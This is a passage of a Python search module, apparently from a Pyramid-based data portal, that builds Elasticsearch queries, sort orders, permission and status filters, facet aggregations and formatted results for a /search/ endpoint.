if len(doc_types) == 0:
doc_types = ['Item']
return doc_types
def get_search_fields(request, doc_types):
"""
Returns set of columns that are being searched and highlights
"""
fields = {'uuid'}
highlights = {}
types = request.registry[TYPES]
for doc_type in doc_types:
type_info = types[doc_type]
for value in type_info.schema.get('boost_values', ()):
fields.add('embedded.' + value)
highlights['embedded.' + value] = {}
return fields, highlights
def list_source_fields(request, doc_types, frame):
"""
Returns set of fields that are requested by user or default fields.
These fields are used to further limit the results from the search.
Note that you must provide the full fieldname with embeds, such as:
'field=biosample.biosource.individual.organism.name' and not just
'field=name'
"""
fields_requested = request.normalized_params.getall('field')
if fields_requested:
fields = ['embedded.@id', 'embedded.@type']
for field in fields_requested:
fields.append('embedded.' + field)
elif frame in ['embedded', 'object', 'raw']:
if frame != 'embedded':
# frame=raw corresponds to 'properties' in ES
if frame == 'raw':
frame = 'properties'
# let embedded be searched as well (for faceting)
fields = ['embedded.*', frame + '.*']
else:
fields = [frame + '.*']
else:
fields = ['embedded.*']
return fields
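# Illustrative example (field names are assumptions for this sketch): for ?field=award.project
# this returns ['embedded.@id', 'embedded.@type', 'embedded.award.project'], while a plain
# frame=object search returns ['embedded.*', 'object.*'].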
def build_query(search, prepared_terms, source_fields):
"""
Prepare the query within the Search object.
"""
query_info = {}
string_query = None
# set _source fields for the search
search = search.source(list(source_fields))
# prepare the query from prepared_terms
for field, value in prepared_terms.items():
if field == 'q':
query_info['query'] = value
query_info['lenient'] = True
query_info['default_operator'] = 'AND'
query_info['fields'] = ['full_text']
break
if query_info != {}:
string_query = {'must': {'simple_query_string': query_info}}
query_dict = {'query': {'bool': string_query}}
else:
query_dict = {'query': {'bool':{}}}
search.update_from_dict(query_dict)
return search, string_query
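# Illustrative shape of the query produced for a text search (a sketch):
#   {'query': {'bool': {'must': {'simple_query_string': {
#       'query': 'nucleosome', 'fields': ['full_text'],
#       'default_operator': 'AND', 'lenient': True}}}}}
# Without a 'q' term only {'query': {'bool': {}}} is set; filters are added later in set_filters.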
def set_sort_order(request, search, search_term, types, doc_types, result, schemas):
"""
sets sort order for elasticsearch results
example: /search/?type=Biosource&sort=display_title
will sort by display_title in ascending order. To set descending order,
use the "-" flag: sort_by=-date_created.
    Sorting is done alphabetically and case-sensitive by default.
TODO: add a schema flag for case sensitivity/insensitivity?
ES5: simply pass in the sort OrderedDict into search.sort
"""
sort = OrderedDict()
result_sort = OrderedDict()
if len(doc_types) == 1:
type_schema = types[doc_types[0]].schema
else:
type_schema = None
def add_to_sort_dict(requested_sort):
if requested_sort.startswith('-'):
name = requested_sort[1:]
order = 'desc'
else:
name = requested_sort
order = 'asc'
sort_schema = schema_for_field(name, request, doc_types)
if sort_schema:
sort_type = sort_schema.get('type')
else:
sort_type = 'string'
# ES type != schema types
if sort_type == 'integer':
sort['embedded.' + name] = result_sort[name] = {
'order': order,
'unmapped_type': 'long',
'missing': '_last'
}
elif sort_type == 'number':
sort['embedded.' + name] = result_sort[name] = {
'order': order,
'unmapped_type': 'float',
'missing': '_last'
}
elif sort_schema and determine_if_is_date_field(name, sort_schema):
sort['embedded.' + name + '.raw'] = result_sort[name] = {
'order': order,
'unmapped_type': 'date',
'missing': '_last'
}
else:
# fallback case, applies to all string type:string fields
sort['embedded.' + name + '.lower_case_sort'] = result_sort[name] = {
'order': order,
'unmapped_type': 'keyword',
'missing': '_last'
}
# Prefer sort order specified in request, if any
requested_sorts = request.normalized_params.getall('sort')
if requested_sorts:
for rs in requested_sorts:
add_to_sort_dict(rs)
else:
# check default sort fields defined in the schema
# example definition:
# "default_sort_fields": [
# {
# "field_name": "date_published",
# "order": "desc"
# },
# {
# "field_name": "display_title",
# "order": "asc"
# }
# ]
for schema in schemas:
if 'default_sort_fields' in schema:
for fields in schema['default_sort_fields']:
order = fields.get('order','')
fieldName = fields.get('field_name','')
if order and order == 'desc':
fieldName = '-' + fieldName
add_to_sort_dict(fieldName)
text_search = search_term.get('q')
# Otherwise we use a default sort only when there's no text search to be ranked
if not sort and (text_search == '*' or not text_search):
# If searching for a single type, look for sort options in its schema
if type_schema:
if 'sort_by' in type_schema:
for k, v in type_schema['sort_by'].items():
# Should always sort on raw field rather than analyzed field
# OR search on lower_case_sort for case insensitive results
sort['embedded.' + k + '.lower_case_sort'] = result_sort[k] = v
# Default is most recent first, then alphabetical by label
if not sort:
sort['embedded.date_created.raw'] = result_sort['date_created'] = {
'order': 'desc',
'unmapped_type': 'keyword',
}
sort['embedded.label.raw'] = result_sort['label'] = {
'order': 'asc',
'missing': '_last',
'unmapped_type': 'keyword',
}
elif not sort and text_search and text_search != '*':
search = search.sort( # Multi-level sort. See http://www.elastic.co/guide/en/elasticsearch/guide/current/_sorting.html#_multilevel_sorting & https://stackoverflow.com/questions/46458803/python-elasticsearch-dsl-sorting-with-multiple-fields
{ '_score' : { "order": "desc" } },
{ 'embedded.date_created.raw' : { 'order': 'desc', 'unmapped_type': 'keyword' }, 'embedded.label.raw' : { 'order': 'asc', 'unmapped_type': 'keyword', 'missing': '_last' } },
{ '_uid' : { 'order': 'asc' } } # 'embedded.uuid.raw' (instd of _uid) sometimes results in 400 bad request : 'org.elasticsearch.index.query.QueryShardException: No mapping found for [embedded.uuid.raw] in order to sort on'
)
result['sort'] = result_sort = { '_score' : { "order" : "desc" } }
return search
if sort and result_sort:
result['sort'] = result_sort
search = search.sort(sort)
return search
def set_filters(request, search, result, principals, doc_types):
"""
Sets filters in the query
"""
# these next two dictionaries should each have keys equal to query_field
# and values: must_terms: [<list of terms>], must_not_terms: [<list of terms>], add_no_value: True/False/None
field_filters = {
'principals_allowed.view' : {
'must_terms': principals,
'must_not_terms': [],
'add_no_value': None
},
        'embedded.@type.raw' : {
'must_terms': doc_types,
'must_not_terms': [],
'add_no_value': None
},
'embedded.status.raw' : {
'must_terms': [],
'must_not_terms': [],
'add_no_value': None
}
}
range_filters = {}
# Exclude status=deleted Items unless explicitly requested/filtered-in.
if 'deleted' not in request.normalized_params.getall('status'):
field_filters['embedded.status.raw']['must_not_terms'].append('deleted')
if 'replaced' not in request.normalized_params.getall('status'):
field_filters['embedded.status.raw']['must_not_terms'].append('replaced')
# Exclude type=TrackingItem and type=OntologyTerm from results unless are explictly specified
if 'TrackingItem' not in doc_types:
        field_filters['embedded.@type.raw']['must_not_terms'].append('TrackingItem')
if 'OntologyTerm' not in doc_types:
        field_filters['embedded.@type.raw']['must_not_terms'].append('OntologyTerm')
for field, term in request.normalized_params.items():
not_field = False # keep track if query is NOT (!)
exists_field = False # keep track of null values
range_type = False # If we determine is a range request (field.to, field.from), will be populated with string 'date' or 'numerical'
range_direction = None
if field in COMMON_EXCLUDED_URI_PARAMS + ['q']:
continue
elif field == 'type' and term != 'Item':
continue
elif term == 'No value':
exists_field = True
# Check for date or numerical range filters
if (len(field) > 3 and field[-3:] == '.to') or (len(field) > 5 and field[-5:] == '.from'):
if field[-3:] == '.to':
f_field = field[:-3]
range_direction = "lte"
else:
f_field = field[:-5]
range_direction = "gte"
# If schema for field is not found (and range_type thus not set),
# then treated as ordinary term filter (likely will get 0 results)
field_schema = schema_for_field(f_field, request, doc_types)
if field_schema:
range_type = 'date' if determine_if_is_date_field(f_field, field_schema) else 'numerical'
# Add filter to result
qs = urlencode([
(k.encode('utf-8'), v.encode('utf-8'))
for k, v in request.normalized_params.items()
if (k != field or v != term)
])
remove_path = '{}?{}'.format(request.path, qs)
# default to searching type=Item rather than empty filter path
if remove_path[-1] == '?':
remove_path += 'type=Item'
result['filters'].append({
'field' : field,
'term' : term,
'remove': remove_path
})
# handle NOT
if field.endswith('!'):
field = field[:-1]
not_field = True
# Add filter to query
if range_type and f_field and range_type in ('date', 'numerical'):
query_field = 'embedded.' + f_field
elif field.startswith('validation_errors') or field.startswith('aggregated_items'):
query_field = field + '.raw'
elif field == 'type':
            query_field = 'embedded.@type.raw'
else:
query_field = 'embedded.' + field + '.raw'
if range_type:
if query_field not in range_filters:
range_filters[query_field] = {}
if range_type == 'date':
range_filters[query_field]['format'] = 'yyyy-MM-dd HH:mm'
if range_direction in ('gt', 'gte', 'lt', 'lte'):
if range_type == "date" and len(term) == 10:
# Correct term to have hours, e.g. 00:00 or 23:59, if not otherwise supplied.
if range_direction == 'gt' or range_direction == 'lte':
term += ' 23:59'
elif range_direction == 'gte' or range_direction == 'lt':
term += ' 00:00'
if range_filters[query_field].get(range_direction) is None:
range_filters[query_field][range_direction] = term
else:
# If have a value already (e.g. multiple ranges selected), choose the widening option.
if range_direction == 'gt' or range_direction == 'gte':
if term < range_filters[query_field][range_direction]:
range_filters[query_field][range_direction] = term
elif range_direction == 'lt' or range_direction == 'lte':
if term > range_filters[query_field][range_direction]:
range_filters[query_field][range_direction] = term
else:
if query_field not in field_filters:
field_filters[query_field] = {
'must_terms': [],
'must_not_terms': [],
'add_no_value': None
}
# handle case of filtering for null values
if exists_field:
# the value below is True when we want to include 'No value' as a filter
field_filters[query_field]['add_no_value'] = False if not_field else True
continue
if not_field:
field_filters[query_field]['must_not_terms'].append(term)
else:
field_filters[query_field]['must_terms'].append(term)
must_filters = []
must_not_filters = []
for query_field, filters in field_filters.items():
must_terms = {'terms': {query_field: filters['must_terms']}} if filters['must_terms'] else {}
must_not_terms = {'terms': {query_field: filters['must_not_terms']}} if filters['must_not_terms'] else {}
if filters['add_no_value'] is True:
# add to must_not in an OR case, which is equivalent to filtering on 'No value'
should_arr = [must_terms] if must_terms else []
should_arr.append({'bool': {'must_not': {'exists': {'field': query_field}}}})
must_filters.append({'bool': {'should': should_arr}})
elif filters['add_no_value'] is False:
# add to must_not in an OR case, which is equivalent to filtering on '! No value'
should_arr = [must_terms] if must_terms else []
should_arr.append({'exists': {'field': query_field}})
must_filters.append({'bool': {'should': should_arr}})
else: # no filtering on 'No value'
if must_terms: must_filters.append(must_terms)
if must_not_terms: must_not_filters.append(must_not_terms)
# lastly, add range limits to filters if given
for range_field, range_def in range_filters.items():
must_filters.append({
'range' : { range_field : range_def }
})
# To modify filters of elasticsearch_dsl Search, must call to_dict(),
# modify that, then update from the new dict
prev_search = search.to_dict()
# initialize filter hierarchy
final_filters = {'bool': {'must': must_filters, 'must_not': must_not_filters}}
prev_search['query']['bool']['filter'] = final_filters
search.update_from_dict(prev_search)
return search, final_filters
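# Illustrative shape of final_filters for a plain ?type=Experiment search (a sketch;
# exact values depend on the request, doc_types, and the caller's principals):
#   {'bool': {'must': [{'terms': {'principals_allowed.view': ['system.Everyone', ...]}},
#                      {'terms': {'embedded.@type.raw': ['Experiment']}}],
#             'must_not': [{'terms': {'embedded.@type.raw': ['TrackingItem', 'OntologyTerm']}},
#                          {'terms': {'embedded.status.raw': ['deleted', 'replaced']}}]}}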
def initialize_additional_facets(request, doc_types, additional_facets, append_facets, current_type_schema):
""" Helper function for below method that handles additional_facets URL param
:param request: current request
:param doc_types: doc_types we are searching on
:param additional_facets: extra facets specified
:param append_facets: list to add additional_facets to
:param current_type_schema: schema of the item we are faceting on
"""
for extra_facet in additional_facets:
aggregation_type = 'terms' # default
# check if defined in facets
if 'facets' in current_type_schema:
if extra_facet in current_type_schema['facets']:
if not current_type_schema['facets'][extra_facet].get('disabled', False):
append_facets.append((extra_facet, current_type_schema['facets'][extra_facet]))
continue # if we found the facet, always continue from here
# not specified as facet - infer range vs. term based on schema
field_definition = schema_for_field(extra_facet, request, doc_types)
if not field_definition: # if not on schema, try "terms"
append_facets.append((
extra_facet, {'title': extra_facet.title()}
))
else:
t = field_definition.get('type', None)
if not t:
log.error('Encountered an additional facet that has no type! %s' % field_definition)
continue # drop this facet
# terms for string
if t == 'string':
append_facets.append((
extra_facet, {'title': extra_facet.title(), 'aggregation_type': aggregation_type}
))
else: # try stats
aggregation_type = 'stats'
append_facets.append((
extra_facet, {
'title': field_definition.get('title', extra_facet.title()),
'aggregation_type': aggregation_type,
'number_step': 'any'
}
))
def initialize_facets(request, doc_types, prepared_terms, schemas, additional_facets):
"""
Initialize the facets used for the search. If searching across multiple
doc_types, only use the default 'Data Type' and 'Status' facets.
Add facets for custom url filters whether or not they're in the schema
Args:
doc_types (list): Item types (@type) for which we are performing a search for.
prepared_terms (dict): terms to match in ES, keyed by ES field name.
schemas (list): List of OrderedDicts of schemas for doc_types.
Returns:
list: tuples containing (0) ElasticSearch-formatted field name (e.g. `embedded.status`) and (1) list of terms for it.
"""
facets = [
# More facets will be appended to this list from item schema plus from any currently-active filters (as requested in URI params).
('type', {'title': 'Data Type'})
]
append_facets = [
# Facets which will be appended after those which are in & added to `facets`
('status', {'title': 'Status'}),
# TODO: Re-enable below line if/when 'range' URI param queries for date & numerical fields are implemented.
# ('date_created', {'title': 'Date Created', 'hide_from_view' : True, 'aggregation_type' : 'date_histogram' })
]
# validation_error_facets = [
# ('validation_errors.name', {'title': 'Validation Errors', 'order': 999})
# ]
# hold disabled facets from schema; we also want to remove these from the prepared_terms facets
disabled_facets = []
current_type_schema = request.registry[TYPES][doc_types[0]].schema
initialize_additional_facets(request, doc_types, additional_facets,
append_facets, current_type_schema)
# Add facets from schema if one Item type is defined.
# Also, conditionally add extra appendable facets if relevant for type from schema.
if len(doc_types) == 1 and doc_types[0] != 'Item':
if 'facets' in current_type_schema:
schema_facets = OrderedDict(current_type_schema['facets'])
for schema_facet in schema_facets.items():
if schema_facet[1].get('disabled', False) or schema_facet[1].get('default_hidden', False):
disabled_facets.append(schema_facet[0])
continue # Skip disabled facets.
facets.append(schema_facet)
# Add facets for any non-schema ?field=value filters requested in the search (unless already set)
used_facets = [facet[0] for facet in facets + append_facets]
    used_facet_titles = [
facet[1]['title'] for facet in facets + append_facets
if 'title' in facet[1]
]
for field in prepared_terms:
if field.startswith('embedded'):
split_field = field.strip().split('.') # Will become, e.g. ['embedded', 'experiments_in_set', 'files', 'file_size', 'from']
use_field = '.'.join(split_field[1:])
# 'terms' is the default per-term bucket aggregation for all non-schema facets
aggregation_type = 'terms'
# Use the last part of the split field to get the field title
title_field = split_field[-1]
            # workaround: if query has a '!=' condition, title_field ends with '!'. This prevents finding the proper display title.
# TODO: instead of workaround, '!' could be excluded while generating query results
if title_field.endswith('!'):
title_field = title_field[:-1]
# if searching for a display_title, use the title of parent object
# use `is_object_title` to keep track of this
if title_field == 'display_title' and len(split_field) > 1:
title_field = split_field[-2]
is_object_title = True
else:
is_object_title = False
if title_field in used_facets or title_field in disabled_facets:
# Cancel if already in facets or is disabled
continue
used_facets.append(title_field)
# If we have a range filter in the URL,
if title_field == 'from' or title_field == 'to':
if len(split_field) >= 3:
f_field = ".".join(split_field[1:-1])
field_schema = schema_for_field(f_field, request, doc_types)
if field_schema:
is_date_field = determine_if_is_date_field(field, field_schema)
is_numerical_field = field_schema['type'] in ("integer", "float", "number")
if is_date_field or is_numerical_field:
title_field = field_schema.get("title", split_field[-2])
use_field = f_field
aggregation_type = 'stats'
for schema in schemas:
if title_field in schema['properties']:
title_field = schema['properties'][title_field].get('title', title_field)
# see if the title field conflicts for is_object_title facets
if is_object_title and title_field in used_facet_titles:
title_field += ' (Title)'
break
facet_tuple = (use_field, {'title': title_field, 'aggregation_type' : aggregation_type})
# At moment is equivalent to `if aggregation_type == 'stats'`` until/unless more agg types are added for _facets_.
if aggregation_type != 'terms':
# Remove completely if duplicate (e.g. .from and .to both present)
if use_field in used_facets:
continue
#facet_tuple[1]['hide_from_view'] = True # Temporary until we handle these better on front-end.
# Facet would be otherwise added twice if both `.from` and `.to` are requested.
facets.append(facet_tuple)
# Append additional facets (status, validation_errors, ...) at the end of
# list unless were already added via schemas, etc.
used_facets = [ facet[0] for facet in facets ] # Reset this var
for ap_facet in append_facets: # + validation_error_facets:
if ap_facet[0] not in used_facets:
facets.append(ap_facet)
else: # Update with better title if not already defined from e.g. requested filters.
existing_facet_index = used_facets.index(ap_facet[0])
if facets[existing_facet_index][1].get('title') in (None, facets[existing_facet_index][0]):
facets[existing_facet_index][1]['title'] = ap_facet[1]['title']
return facets
def schema_for_field(field, request, doc_types, should_log=False):
'''
Find the schema for the given field (in embedded '.' format). Uses
ff_utils.crawl_schema from snovault and logs any cases where there is an
error finding the field from the schema. Caches results based off of field
and doc types used
Args:
field (string): embedded field path, separated by '.'
request: current Request object
doc_types (list): @types for the search
should_log (bool): logging will only occur if set to True
Returns:
Dictionary schema for the field, or None if not found
'''
types = request.registry[TYPES]
schemas = [ types[dt].schema for dt in doc_types ]
# We cannot hash dict by list (of doc_types) so we convert to unique ordered string
doc_type_string = ','.join(doc_types)
cache = getattr(request, '_field_schema_cache', {})
if (field, doc_type_string) in cache:
return cache[(field, doc_type_string)]
field_schema = None
# for 'validation_errors.*' and 'aggregated_items.*',
# schema will never be found and logging isn't helpful
if (schemas and not field.startswith('validation_errors.') and
not field.startswith('aggregated_items.')):
# 'type' field is really '@type' in the schema
use_field = '@type' if field == 'type' else field
# eliminate '!' from not fields
use_field = use_field[:-1] if use_field.endswith('!') else use_field
for schema in schemas:
try:
field_schema = crawl_schema(types, use_field, schema)
except Exception as exc: # cannot find schema. Log and Return None
if should_log:
log.warning('Cannot find schema in search.py. Type: %s. Field: %s'
% (doc_types[0], field), field=field, error=str(exc))
else:
if field_schema is not None:
break
# Cache result, even if not found, for this request.
cache[(field, doc_type_string)] = field_schema
if not hasattr(request, '_field_schema_cache'):
setattr(request, '_field_schema_cache', cache)
return field_schema
def is_linkto_or_object_array_root_field(field, types, doc_types):
'''Not used currently. May be useful for if we want to enabled "type" : "nested" mappings on lists of dictionaries'''
schema = types[doc_types[0]].schema
field_root = field.split('.')[0]
fr_schema = (schema and schema.get('properties', {}).get(field_root, None)) or None
if fr_schema and fr_schema['type'] == 'array' and (fr_schema['items'].get('linkTo') is not None or fr_schema['items']['type'] == 'object'):
return True
return False
def generate_filters_for_terms_agg_from_search_filters(query_field, search_filters, string_query):
'''
We add a copy of our filters to each facet, minus that of
facet's field itself so that we can get term counts for other terms filters.
And be able to filter w/ it.
Remove filters from fields they apply to.
For example, the 'biosource_type' aggs should not have any
biosource_type filter in place.
Handle 'must' and 'must_not' filters separately
Returns
Copy of search_filters, minus filter for current query_field (if one set).
'''
facet_filters = deepcopy(search_filters['bool'])
for filter_type in ['must', 'must_not']:
if search_filters['bool'][filter_type] == []:
continue
        for active_filter in search_filters['bool'][filter_type]: # active_filter => e.g. { 'terms' : { 'embedded.@type.raw': ['ExperimentSetReplicate'] } }
if 'bool' in active_filter and 'should' in active_filter['bool']:
# handle No value case
inner_bool = None
inner_should = active_filter.get('bool').get('should', [])
for or_term in inner_should:
# this may be naive, but assume first non-terms
                    # filter is the No value query
if 'terms' in or_term:
continue
else:
inner_bool = or_term
break
if 'exists' in inner_bool:
compare_field = inner_bool['exists'].get('field')
else:
# attempt to get the field from the alternative No value syntax
compare_field = inner_bool.get('bool', {}).get('must_not', {}).get('exists', {}).get('field')
                if compare_field == query_field and query_field != 'embedded.@type.raw':
facet_filters[filter_type].remove(active_filter)
if 'terms' in active_filter:
# there should only be one key here
for compare_field in active_filter['terms'].keys():
# remove filter for a given field for that facet
# skip this for type facet (field = 'type')
# since we always want to include that filter.
                    if compare_field == query_field and query_field != 'embedded.@type.raw':
facet_filters[filter_type].remove(active_filter)
elif 'range' in active_filter:
for compare_field in active_filter['range'].keys():
# Do same as for terms
if compare_field == query_field:
facet_filters[filter_type].remove(active_filter)
# add the string_query, if present, to the bool term with facet_filters
if string_query and string_query['must']:
# combine statements within 'must' for each
facet_filters['must'].append(string_query['must'])
return facet_filters
def set_facets(search, facets, search_filters, string_query, request, doc_types, custom_aggregations=None, size=25, from_=0):
"""
Sets facets in the query as ElasticSearch aggregations, with each aggregation to be
filtered by search_filters minus filter affecting facet field in order to get counts
for other facet term options.
ES5 - simply sets aggs by calling update_from_dict after adding them in
:param facets: Facet field (0) in object dot notation, and a dict or OrderedDict with title property (1).
:type facets: List of tuples.
:param search_filters: Dict of filters which are set for the ES query in set_filters
:param string_query: Dict holding the query_string used in the search
"""
if from_ != 0:
return search
aggs = OrderedDict()
for field, facet in facets: # E.g. 'type','experimentset_type','experiments_in_set.award.project', ...
field_schema = schema_for_field(field, request, doc_types, should_log=True)
is_date_field = field_schema and determine_if_is_date_field(field, field_schema)
is_numerical_field = field_schema and field_schema['type'] in ("integer", "float", "number")
if field == 'type':
            query_field = 'embedded.@type.raw'
elif field.startswith('validation_errors') or field.startswith('aggregated_items'):
query_field = field + '.raw'
elif facet.get('aggregation_type') in ('stats', 'date_histogram', 'histogram', 'range'):
query_field = 'embedded.' + field
else:
query_field = 'embedded.' + field + '.raw'
## Create the aggregation itself, extend facet with info to pass down to front-end
agg_name = field.replace('.', '-')
agg_type = facet.get('aggregation_type', 'terms')
agg_id = agg_type + ':' + agg_name
facet_filters = generate_filters_for_terms_agg_from_search_filters(query_field, search_filters, string_query)
        # handle stats aggregation
if agg_type == 'stats':
if is_date_field:
facet['field_type'] = 'date'
elif is_numerical_field:
facet['field_type'] = field_schema['type'] or "number"
aggs[agg_id] = {
'aggs': {
"primary_agg": {
'stats': {
'field': query_field
}
}
},
'filter': {'bool': facet_filters}
}
# handle range aggregation
elif agg_type == 'range':
ranges = [{k: v for k, v in r.items() if k in ['from', 'to']} for r in facet['ranges']]
aggs[agg_id] = {
'aggs': {
'primary_agg': {
'range': {
'field': query_field,
'ranges': ranges
}
}
},
'filter': {'bool': facet_filters}
}
# default - terms aggregation
else:
facet['aggregation_type'] = 'terms'
term_aggregation = {
"terms" : {
'size' : 100, # Maximum terms returned (default=10); see https://github.com/10up/ElasticPress/wiki/Working-with-Aggregations
'field' : query_field,
'missing' : facet.get("missing_value_replacement", "No value")
}
}
aggs[facet['aggregation_type'] + ":" + agg_name] = {
'aggs': {
"primary_agg" : term_aggregation
},
'filter': {'bool': facet_filters},
}
# Update facet with title, description from field_schema, if missing.
if facet.get('title') is None and field_schema and 'title' in field_schema:
facet['title'] = field_schema['title']
if facet.get('description') is None and field_schema and 'description' in field_schema:
facet['description'] = field_schema['description']
# to achieve OR behavior within facets, search among GLOBAL results,
# not just returned ones. to do this, wrap aggs in ['all_items']
# and add "global": {} to top level aggs query
# see elasticsearch global aggs for documentation (should be ES5 compliant)
search_as_dict = search.to_dict()
search_as_dict['aggs'] = {
'all_items': {
'global': {},
'aggs': aggs
}
}
if size == 0:
# Only perform aggs if size==0 requested, to improve performance for search page queries.
        # We do currently have (hidden) monthly date histogram facets which have yet to be utilized for common size!=0 agg use cases.
set_additional_aggregations(search_as_dict, request, doc_types, custom_aggregations)
search.update_from_dict(search_as_dict)
return search
def set_additional_aggregations(search_as_dict, request, doc_types, extra_aggregations=None):
'''
Per-type aggregations may be defined in schemas. Apply them OUTSIDE of globals so they act on our current search filters.
Warning: `search_as_dict` is modified IN PLACE.
'''
types = request.registry[TYPES]
schema = types[doc_types[0]].schema
if schema.get('aggregations'):
for schema_agg_name in schema['aggregations'].keys():
if schema_agg_name == 'all_items':
raise Exception('all_items is a reserved agg name and not allowed as an extra aggregation name.')
search_as_dict['aggs'][schema_agg_name] = schema['aggregations'][schema_agg_name]
if extra_aggregations:
for extra_agg_name in extra_aggregations.keys():
if extra_agg_name == 'all_items':
raise Exception('all_items is a reserved agg name and not allowed as an extra aggregation name.')
search_as_dict['aggs'][extra_agg_name] = extra_aggregations[extra_agg_name]
return search_as_dict
def execute_search(search):
"""
Execute the given Elasticsearch-dsl search. Raise HTTPBadRequest for any
exceptions that arise.
Args:
search: the Elasticsearch-dsl prepared in the search() function
Returns:
Dictionary search results
"""
err_exp = None
try:
es_results = search.execute().to_dict()
except ConnectionTimeout as exc:
err_exp = 'The search failed due to a timeout. Please try a different query.'
except RequestError as exc:
# try to get a specific error message. May fail in some cases
try:
err_detail = str(exc.info['error']['root_cause'][0]['reason'])
except Exception:
err_detail = str(exc)
err_exp = 'The search failed due to a request error: ' + err_detail
except TransportError as exc:
# most general exception
exc_status = getattr(exc, 'status_code')
if exc_status == 'TIMEOUT':
err_exp = 'The search failed due to a timeout. Please try a different query.'
else:
err_exp = 'The search failed due to a transport error: ' + str(exc)
except Exception as exc:
err_exp = 'The search failed. The DCIC team has been notified.'
if err_exp:
raise HTTPBadRequest(explanation=err_exp)
return es_results
def format_facets(es_results, facets, total, additional_facets, search_frame='embedded'):
"""
Format the facets for the final results based on the es results.
Sort based off of the 'order' of the facets
These are stored within 'aggregations' of the result.
If the frame for the search != embedded, return no facets
"""
result = []
if search_frame != 'embedded':
return result
# Loading facets in to the results
if 'aggregations' not in es_results:
return result
aggregations = es_results['aggregations']['all_items']
used_facets = set()
# Sort facets by order (ascending).
# If no order is provided, assume 0 to
# retain order of non-explicitly ordered facets
for field, facet in sorted(facets, key=lambda fct: fct[1].get('order', 0)):
if facet.get('default_hidden', False) and field not in additional_facets: # skip if specified
continue
result_facet = {
'field' : field,
'title' : facet.get('title', field),
'total' : 0
# To be added depending on facet['aggregation_type']: 'terms', 'min', 'max', 'min_as_string', 'max_as_string', ...
}
result_facet.update({ k:v for k,v in facet.items() if k not in result_facet.keys() })
used_facets.add(field)
field_agg_name = field.replace('.', '-')
agg_type = facet['aggregation_type']
full_agg_name = agg_type + ':' + field_agg_name
if full_agg_name in aggregations:
if agg_type == 'stats':
result_facet['total'] = aggregations[full_agg_name]['doc_count']
# Used for fields on which can do range filter on, to provide min + max bounds
for k in aggregations[full_agg_name]["primary_agg"].keys():
result_facet[k] = aggregations[full_agg_name]["primary_agg"][k]
elif agg_type == 'range':
bucket_location = aggregations[full_agg_name]['primary_agg']
# TODO - refactor ?
# merge bucket labels from ranges into buckets
for r in result_facet['ranges']:
for b in bucket_location['buckets']:
# if ranges match we found our bucket, propagate doc_count into 'ranges' field
if (r.get('from', -1) == b.get('from', -1)) and (r.get('to', -1) == b.get('to', -1)):
r['doc_count'] = b['doc_count']
break
# 'terms' assumed
else:
# Default - terms, range, or histogram buckets. Buckets may not be present
result_facet['terms'] = aggregations[full_agg_name]["primary_agg"]["buckets"]
            # Facets with a single term are still kept, for the summary info they provide about the search
if len(result_facet.get('terms', [])) < 1:
continue
if len(aggregations[full_agg_name].keys()) > 2:
result_facet['extra_aggs'] = { k:v for k,v in aggregations[full_agg_name].items() if k not in ('doc_count', "primary_agg") }
result.append(result_facet)
return result
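# Illustration only (not part of the original module): a tiny fabricated example of
# the aggregation shape format_facets() consumes and the facet entry it emits. The
# field name 'experiment_type' and the counts are invented for this sketch.
def _example_format_facets_usage():
    fake_es_results = {
        'aggregations': {
            'all_items': {
                'terms:experiment_type': {
                    'doc_count': 12,
                    'primary_agg': {'buckets': [{'key': 'HiC', 'doc_count': 12}]},
                },
            },
        },
    }
    fake_facets = [('experiment_type', {'title': 'Experiment Type', 'aggregation_type': 'terms'})]
    # Expected result (roughly):
    # [{'field': 'experiment_type', 'title': 'Experiment Type', 'total': 0,
    #   'aggregation_type': 'terms', 'terms': [{'key': 'HiC', 'doc_count': 12}]}]
    return format_facets(fake_es_results, fake_facets, total=12, additional_facets=[])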
def format_extra_aggregations(es_results):
if 'aggregations' not in es_results:
return {}
return { k:v for k,v in es_results['aggregations'].items() if k != 'all_items' }
def format_results(request, hits, search_frame):
"""
Loads results to pass onto UI
Will retrieve the desired frame from the search hits and automatically
add 'validation_errors' and 'aggregated_items' frames if they are present
"""
fields_requested = request.normalized_params.getall('field')
if fields_requested:
frame = 'embedded'
elif search_frame:
frame = search_frame
else:
frame = 'embedded'
if frame in ['embedded', 'object', 'raw']:
# transform 'raw' to 'properties', which is what is stored in ES
if frame == 'raw':
frame = 'properties'
for hit in hits:
frame_result = hit['_source'][frame]
if 'validation_errors' in hit['_source'] and 'validation_errors' not in frame_result:
frame_result['validation_errors'] = hit['_source']['validation_errors']
if 'aggregated_items' in hit['_source'] and 'aggregated_items' not in frame_result:
frame_result['aggregated_items'] = hit['_source']['aggregated_items']
yield frame_result
return
def find_index_by_doc_types(request, doc_types, ignore):
"""
Find the correct index(es) to be searched given a list of doc_types.
The types in doc_types are the item class names, formatted like
'Experiment HiC' and index names are the item types, formatted like
'experiment_hi_c'.
Ignore any collection names provided in the ignore param, an array.
Formats output indexes as a string usable by elasticsearch
"""
indexes = []
for doc_type in doc_types:
if doc_type in ignore:
continue
else:
result = find_collection_subtypes(request.registry, doc_type)
namespaced_results = map(lambda t: get_namespaced_index(request, t), result)
indexes.extend(namespaced_results)
# remove any duplicates
indexes = list(set(indexes))
index_string = ','.join(indexes)
return index_string
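# Illustration only (not part of the original module): as the docstring describes,
# a call like the following (values fabricated) turns item class names into
# namespaced index names, de-duplicates them, and joins them with commas:
#
#     find_index_by_doc_types(request, ['ExperimentHiC', 'Biosample'], ignore=['Item'])
#     # -> e.g. 'my-namespace-experiment_hi_c,my-namespace-biosample'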
def make_search_subreq(request, path):
subreq = make_subrequest(request, path)
subreq._stats = getattr(request, "_stats", {})
subreq.registry = request.registry
if hasattr(request, "context"):
subreq.context = request.context
else:
subreq.context = None
subreq.headers['Accept'] = 'application/json'
return subreq
def get_iterable_search_results(request, search_path='/search/', param_lists=None, **kwargs):
'''
Loops through search results, returns 100 (or search_results_chunk_row_size) results at a time. Pass it through itertools.chain.from_iterable to get one big iterable of results.
TODO: Maybe make 'limit=all', and instead of calling invoke_subrequest(subrequest), instead call iter_search_results!
:param request: Only needed to pass to do_subreq to make a subrequest with.
:param search_path: Root path to call, defaults to /search/ (can also use /browse/).
:param param_lists: Dictionary of param:lists_of_vals which is converted to URL query.
:param search_results_chunk_row_size: Amount of results to get per chunk. Default should be fine.
'''
if param_lists is None:
param_lists = deepcopy(DEFAULT_BROWSE_PARAM_LISTS)
else:
param_lists = deepcopy(param_lists)
param_lists['limit'] = ['all']
param_lists['from'] = [0]
param_lists['sort'] = param_lists.get('sort','uuid')
